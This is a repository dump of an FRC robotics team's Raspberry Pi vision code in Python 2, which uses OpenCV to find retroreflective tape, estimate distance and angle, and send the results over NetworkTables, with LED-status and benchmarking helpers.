"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 5,
"path": "/README.md",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "# FRC Team 1777 Co-Processing Code\n\n`src/main.py` is the actual program that should be used in competition.\n\n`src/test_with_images.py` is intended for testing when props are not available. Images for this are pulled from `img/test_images/`\n"
},
{
"alpha_fraction": 0.5379665493965149,
"alphanum_fraction": 0.5469755530357361,
"avg_line_length": 31.759037017822266,
"blob_id": "d996a8266da637df420b7f292227d782d33b6495",
"content_id": "f4ae09222813e79c42f45d599d213c2f0f448e3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5439,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 166,
"path": "/src/main.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from math import sqrt\nfrom networktables import NetworkTables\nfrom constants import *\nimport vision_utils\nimport cv2\nimport os\nimport pipeline\nimport numpy\nimport sys\nimport threading\nimport time\n\n\nframe = None\nrval = None\n\n\n# load Pi Camera drivers\nos.system(\"sudo modprobe bcm2835-v4l2 #\")\n\n\npl = pipeline.GripPipeline()\n\n\ndef led_on():\n os.system(\"sudo echo 1 > /sys/class/leds/led0/brightness\")\n\n\ndef led_off():\n os.system(\"sudo echo 0 > /sys/class/leds/led0/brightness\")\n\n\nif __name__ == \"__main__\":\n try:\n if \"-t\" in sys.argv[1:]:\n TEST_OUTPUT = True\n if \"-s\" in sys.argv[1:]:\n STREAM_VIDEO = True\n if \"--no-led\" in sys.argv[1:]:\n LED_STATUS = False\n if \"--no-rec\" in sys.argv[1:]:\n RECORD_STREAM = False\n except IndexError:\n pass\n \n if LED_STATUS:\n # prepare status LED for use by disabling normal behavior\n print \"[INFO] Disabling normal status LED behavior\"\n os.system(\"sudo echo none > /sys/class/leds/led0/trigger\")\n led_off()\n \n if not TEST_OUTPUT:\n print \"[INFO] Connecting to NetworkTables\"\n NetworkTables.initialize(server=\"roboRIO-1777-FRC.local\")\n sd = NetworkTables.getTable(\"SmartDashboard\")\n \n print \"[INFO] Calculating focal length from test image\"\n calibImg = cv2.imread(CALIB_IMG_PATH)\n if calibImg is None:\n print \"[ERROR] Calibration imaage not found: \" + CALIB_IMG_PATH\n exit()\n pl.process(calibImg)\n try:\n cnt = [pl.convex_hulls_output[0], pl.convex_hulls_output[1]]\n except IndexError:\n print \"[ERROR] Calibration failed; did not find two convex hulls\"\n exit()\n focal_length = vision_utils.calculate_focal_length(cnt)\n print \"[INFO] Calibration success; focal_length = \" + str(focal_length) \n \n \n cam = cv2.VideoCapture(0)\n print \"[INFO] Attempting video capture start\"\n \n if cam.isOpened():\n rval, _ = cam.read()\n if rval:\n print \"[INFO] rval test success\"\n else:\n print \"[ERROR] rval test fail\"\n exit()\n else:\n print \"[ERROR] Video capture could not be opened\"\n \n if not TEST_OUTPUT:\n if not sd.isConnected():\n print \"[INFO] Waiting for NetworkTables connection...\"\n while not sd.isConnected():\n pass\n print \"[INFO] NetworkTables ready\"\n \n if LED_STATUS:\n led_on()\n \n if STREAM_VIDEO:\n stream_width = 480\n stream_height = 640\n print \"[INFO] Starting video stream...\"\n server_mjpg = vision_utils.MJPG(None, threading.Lock())\n server = vision_utils.MJPGserver(server_mjpg)\n server.start()\n \n if RECORD_STREAM:\n print \"[INFO] Starting recording\"\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n out = cv2.VideoWriter('last.avi', fourcc, 30.0, (640, 480))\n \n print \"[INFO] Starting detection\"\n \n frame_num = 1\n try:\n while rval:\n vision_utils.start_time(\"reading\")\n rval, frame = cam.read()\n vision_utils.end_time(\"reading\")\n \n vision_utils.start_time(\"processing.grip\")\n pl.process(frame)\n vision_utils.end_time(\"processing.grip\")\n vision_utils.start_time(\"processing.matcher\")\n # pl.process does not return the end image; instead, results are\n # stored in the pipeline object (e.g. pl.find_contours_output)\n pl_out = pl.convex_hulls_output\n if len(pl_out) > 1:\n contour_info = vision_utils.ContourInfo(pl_out, focal_length)\n if TEST_OUTPUT:\n print \"angle = \" + str(contour_info.angle) + \\\n \"; distance = \" + str(contour_info.dist_away) + \\\n \"; frame = \" + str(frame_num)\n else:\n sd.putNumber('pi_angle', contour_info.angle)\n sd.putNumber('pi_distance', contour_info.dist_away)\n sd.putNumber('pi_frame', frame_num)\n frame_num += 1\n vision_utils.end_time(\"processing.matcher\")\n \n if STREAM_VIDEO:\n vision_utils.start_time(\"resize+encode\")\n frame_width, frame_height, _ = frame.shape\n stream_frame = cv2.resize(frame,\n None,\n fx=frame_width / stream_width,\n fy=frame_height / stream_height,\n interpolation=cv2.INTER_CUBIC)\n \n server_mjpg.lock.acquire()\n server_mjpg.frame = cv2.imencode(\".jpg\", frame)[1].tostring()\n server_mjpg.lock.release()\n vision_utils.end_time(\"resize+encode\")\n \n if RECORD_STREAM:\n vision_utils.start_time(\"recording\")\n out.write(frame)\n vision_utils.end_time(\"recording\")\n \n \n except KeyboardInterrupt:\n print \"\\n[INFO] Received KeyboardInterrupt; exiting\"\n vision_utils.report()\n finally:\n print \"[INFO] Releasing video capture\"\n cam.release()\n out.release()\n if STREAM_VIDEO:\n print \"[INFO] Shutting off video stream\"\n server.stop()\n\n"
},
{
"alpha_fraction": 0.7337807416915894,
"alphanum_fraction": 0.7527964115142822,
"avg_line_length": 41.619049072265625,
"blob_id": "cf07456e26466d2da59fd701beb7bd31da0acc6e",
"content_id": "b9fd9889019bcccb43d5f15ef469b13676ef2512",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 21,
"path": "/src/constants.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "# if true, outputs to console instead of NetworkTables\n# set this using \"-t\" instead of manually setting this\nTEST_OUTPUT = False\n# if true, use status (SD card usage) LED to indicate status\n# diable using \"--no-led\" instead of manually setting this\nLED_STATUS = True\n# if true, create an MJPG stream to be used by SmartDashboard\n# set this using \"-s\" instead of manually setting this\nSTREAM_VIDEO = False\n# If true, record a video of the stream sent to the driver\n# station. Disable using \"--no-rec\" instaed of manually\n# setting this. See the readme in ../rec for more info.\nRECORD_STREAM = True\n# absolute path to a calibration image\nCALIB_IMG_PATH = \"/home/pi/Pi2017/img/3feet.jpg\"\n# distance between strips, in inches\nDIST_BETWEEN_STRIPS = 8.5\n# distance between camera peg in the calibration image, in inches\nCALIB_DIST = 36\n# horizontal FoV / width of video\nDEGREES_PER_PIXEL = 0.0971875"
},
{
"alpha_fraction": 0.5493106842041016,
"alphanum_fraction": 0.564687192440033,
"avg_line_length": 22.873416900634766,
"blob_id": "305eadc8d003a45a5a0a94a1eea0d7e1e148b8b3",
"content_id": "e011139e52fd4513d96af14127416bebecaf0b03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1886,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 79,
"path": "/src/led_thread.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport threading\nimport time\nimport os\n\n\ndef toggleLED(ledStatus):\n if ledStatus == \"on\":\n GPIO.output(16, GPIO.HIGH)\n return \"off\"\n elif ledStatus == \"off\":\n GPIO.output(16, GPIO.LOW)\n return \"on\"\n else:\n raise ValueError(\"ledStatus is set to an invalid value: \" + ledStatus)\n\n\ndef slowBlink(ledStatus):\n newStatus = toggleLED(ledStatus)\n time.sleep(.25)\n return newStatus\n\n\ndef fastBlink(ledStatus):\n newStatus = toggleLED(ledStatus)\n time.sleep(0.125)\n return newStatus\n\n\nfunctionStates = {\"slow\": slowBlink, \"fast\": fastBlink}\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(16, GPIO.OUT)\nGPIO.output(16, GPIO.HIGH)\n\n\nclass ledThread(threading.Thread):\n def __init__(self, threadID, name, state, ledStatus):\n super(ledThread, self).__init__()\n self.threadID = threadID\n self.name = name\n self.state = state\n self.ledStatus = ledStatus\n \n self._stop_event = threading.Event()\n \n def stop(self):\n self._stop_event.set()\n \n def stopped(self):\n return self._stop_event.is_set()\n \n def run(self):\n while 1:\n if self.stopped():\n self.state == \"finished\"\n print self.ledStatus\n if self.state == \"finished\":\n GPIO.output(16, GPIO.HIGH)\n break\n elif self.state == \"solid\":\n GPIO.output(16, GPIO.LOW)\n time.sleep(0.1)\n continue\n funcToExec = functionStates[self.state]\n self.ledStatus = funcToExec(self.ledStatus)\n\n\nif __name__ == \"__main__\":\n t1 = ledThread(1, \"LED-thread\", \"solid\", \"on\")\n t1.daemon = True\n t1.start()\n try:\n while True:\n time.sleep(0.1)\n except KeyboardInterrupt:\n print \"ok\"\n t1.stop()\n t1.join()\n"
},
{
"alpha_fraction": 0.5448383688926697,
"alphanum_fraction": 0.5724713206291199,
"avg_line_length": 33.25,
"blob_id": "007e1cf4dec9f10c095e6d1445c7d973027c1014",
"content_id": "32a0845b6986cc6c1c5dc81e6d949b6b2f44582f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1918,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 56,
"path": "/src/vision_utils/contour_info.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from math import sqrt\nfrom constants import *\nimport cv2\n\n\nclass ContourInfo(object):\n def __init__(self, contours, focal_length):\n self._contours = contours\n self._focal_length = focal_length\n self.calculate()\n\n def calculate(self):\n centers = find_center_of_contours(self._contours)\n dist_strips = sqrt( ((centers[1][0] - centers[0][0]) ** 2) + \\\n ((centers[1][1] - centers[0][1]) ** 2) )\n self.midpoint = ( ((centers[0][0] + centers[1][0]) / 2), \\\n ((centers[0][1] + centers[1][1]) / 2) )\n self.dist_away = find_distance(dist_strips, self._focal_length)\n if midpoint[0] < 320:\n self.angle = DEGREES_PER_PIXEL * (320 - midpoint[0])\n else:\n self.angle = -1 * (DEGREES_PER_PIXEL * (midpoint[0] - 320))\n\n\ndef find_center_of_contours(contours):\n \"\"\" Takes a list of contours and returns the centroid\n (center point) of each one.\n \"\"\"\n output = []\n for i in contours:\n m = cv2.moments(i)\n cx = int(m['m10']/m['m00'])\n cy = int(m['m01']/m['m00'])\n output.append((cx, cy))\n return output\n\n\ndef find_distance(dist, focal_len):\n \"\"\" Takes the distance between two strips and the focal\n length of the camera and returns the distance between\n the camera and the peg.\n \"\"\"\n return ( DIST_BETWEEN_STRIPS * focal_len ) / dist\n\n\ndef calculate_focal_length(contours):\n \"\"\" Calculates the focal length of the camera based on two\n contours located a known distance apart.\n\n Takes a list of two contours and returns a float\n indicating the focal length.\n \"\"\"\n centers = find_center_of_contours(contours)\n distance = sqrt( ((centers[1][0] - centers[0][0]) ** 2) + \\\n ((centers[1][1] - centers[0][1]) ** 2) )\n return ( distance * CALIB_DIST ) / DIST_BETWEEN_STRIPS\n"
},
{
"alpha_fraction": 0.5876288414001465,
"alphanum_fraction": 0.6041237115859985,
"avg_line_length": 32.068180084228516,
"blob_id": "554e932b79bc45769d7b48cb1e834a26dc54f015",
"content_id": "4bbdffd93d167dff9948234145ed7ae9149a9451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1455,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 44,
"path": "/src/vision_utils/benchmarking.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "import cv2\nimport collections\n\nexec_times = collections.defaultdict(lambda: [0, 0])\ntimers_in_progress = {}\n\n\ndef add_to_execution_times(type, time):\n global exec_times\n new_time_total = (exec_times[type][1] * exec_times[type][0]) + time\n exec_times[type][0] += 1\n exec_times[type][1] = new_time_total / exec_times[type][0]\n\n\ndef start_time(type):\n global timers_in_progress\n timers_in_progress[type] = cv2.getTickCount()\n\n\ndef end_time(type):\n end = cv2.getTickCount()\n add_to_execution_times(type,\n (end - timers_in_progress[type]) / cv2.getTickFrequency())\n\n\ndef report():\n total_time = 0\n for i in exec_times.values():\n total_time += i[1]\n \n top_line = \"Average time per frame: {} seconds\".format(str(total_time))\n avg_fps_line = \"Average frames per second: {} fps\".format(str(1 / total_time))\n longest_type = max({i: len(i) for i in exec_times.keys()}.values())\n remaining_len = max(len(top_line), len(avg_fps_line)) - (longest_type + 3)\n print top_line\n print avg_fps_line\n print \"=\" * len(top_line)\n for i in exec_times.keys():\n str_out = i.ljust(longest_type + 1) + \"| \"\n percent = exec_times[i][1] / total_time\n str_out += \"#\" * int(round((remaining_len - 6) * percent))\n last_len = remaining_len - int(round((remaining_len - 6) * percent))\n str_out += (\" %.1f%%\" % (percent * 100)).rjust(last_len)\n print str_out\n"
},
{
"alpha_fraction": 0.6442800164222717,
"alphanum_fraction": 0.6602162718772888,
"avg_line_length": 33.45098114013672,
"blob_id": "3ef10084b65dc377f7cd5728e2f1c89639f5d106",
"content_id": "b1b3c99b28fea2cb2704bfb815c1dfe35b16e343",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1757,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 51,
"path": "/src_old/test_from_images.py.old",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy\nimport pipeline\nimport os\nimport sys\nfrom math import sqrt\nfrom main import *\n\n\n# ensures that the Pi Camera drivers are loaded\nos.system(\"sudo modprobe bcm2835-v4l2 #\")\n# GRIP pipeline object\npl = pipeline.GripPipeline()\n\n# list of relative image paths\nIMAGE_PATHS = [\"../img/test_images/1.jpg\", \"../img/test_images/2.jpg\", \"../img/test_images/3.jpg\"]\n# maximum vertical variance between pairs of viable keypoints\nMAX_Y_VARIANCE = 25\n# approx. distance between center of two strips of tape, in inches\nDIST_BETWEEN_STRIPS = 8.5\n# relative path to a calibration image\nCALIB_IMG_PATH = \"../img/3feet.jpg\"\n# distance between camera and peg in the calibration image, in inches\nCALIB_DIST = 36\n\nif __name__ == \"__main__\":\n print \"[INFO] Calculating focal length from test image\"\n calibImg = cv2.imread(CALIB_IMG_PATH)\n if calibImg is None:\n print \"[ERROR] Calibration image not found: \" + CALIB_IMG_PATH\n exit()\n pl.process(calibImg)\n try:\n kp = find_viable_pairs(pl.find_blobs_output)[0]\n except IndexError:\n print \"[ERROR] Calibration failed; no keypoint pairs found\"\n exit()\n focal_length = ( kp[2] * CALIB_DIST ) / DIST_BETWEEN_STRIPS\n ddMulti = kp[2] / (( kp[0].size + kp[1].size ) / 2)\n \n for img in IMAGE_PATHS:\n print \"[INFO] Processing image \" + img\n frame = cv2.imread(img)\n pl.process(frame)\n # pl.process does not return the end image; instead, results are stored in\n # the pipeline object (e.g. pl.find_blobs_output)\n output = pl.find_blobs_output\n viable_points = find_viable_pairs(output, ddMulti)\n \n for i in viable_points:\n print find_distance(i[2], focal_length), i[0].pt, i[1].pt\n"
}
] | 14 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.